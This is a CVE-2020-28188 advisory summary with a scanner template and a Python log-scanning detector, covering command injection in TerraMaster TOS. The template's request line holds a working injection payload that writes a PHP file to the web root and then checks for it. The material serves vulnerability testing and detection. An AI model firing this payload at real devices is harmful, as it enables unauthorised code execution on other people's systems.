Vulnerability description
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to inject OS commands via /include/makecvs.php in the Event parameter.
id: CVE-2020-28188
info:
  name: TerraMaster TOS Unauthenticated Remote Command Execution
  author: Print1n
  severity: critical
  description: |-
    Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to inject OS commands via /include/makecvs.php in the Event parameter.
  reference:
    - https://www.tenable.com/security/research/tra-2020-55
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28188
  tags: cve,cve2020,terramaster,rce
  created: 2023/06/23
set:
  r1: randomLowercase(10)
rules:
  r0:
    request:
      method: GET
      path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r1}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r1}}.php%20&&%20chmod%20755%20/usr/www/{{r1}}.php||
    expression: response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime"))
  r1:
    request:
      method: GET
      path: /{{r1}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(md5(r1)))
expression: r0() && r1()
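
A detection counterpart to the template above, added here as an example (it is not part of the original template or of any project's code): a Python scan of web access logs for requests to /include/makecvs.php whose decoded Event value contains shell metacharacters. The log format, the metacharacter set and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET_PATH = "/include/makecvs.php"   # endpoint named in the advisory
PARAM = "Event"                        # injectable parameter named in the advisory
# Assumed set of shell metacharacters that chain, substitute or redirect commands.
SHELL_META = re.compile(r"[|;&`<>\n\r]|\$[({]")
# Assumed Common/Combined Log Format: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (.+) HTTP/[\d.]+" (\d{3})')

def suspicious_event(target):
    """Return the decoded Event value if it carries shell metacharacters, else None."""
    parts = urlsplit(target)
    # Decode the path as well, so /include/makecvs%2Ephp is still recognised.
    if unquote(parts.path) != TARGET_PATH:
        return None
    # parse_qs percent-decodes values, so %7C and %26 are seen as | and &.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Yield (client, status, decoded_value) for each matching access-log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, _method, target, status = m.groups()
        value = suspicious_event(target)
        if value is not None:
            yield client, int(status), value

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jun/2023:10:00:01 +0000] "GET /include/makecvs.php?Event=http HTTP/1.1" 200 512',
    '198.51.100.7 - - [23/Jun/2023:10:00:05 +0000] "GET /include/makecvs.php?Event=http%7Cid%7C%7C HTTP/1.1" 200 498',
    '198.51.100.7 - - [23/Jun/2023:10:00:09 +0000] "GET /index.php?Event=a%7Cb HTTP/1.1" 200 120',
    'not an access-log line',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"ALERT {client} status={status} Event={value!r}")
```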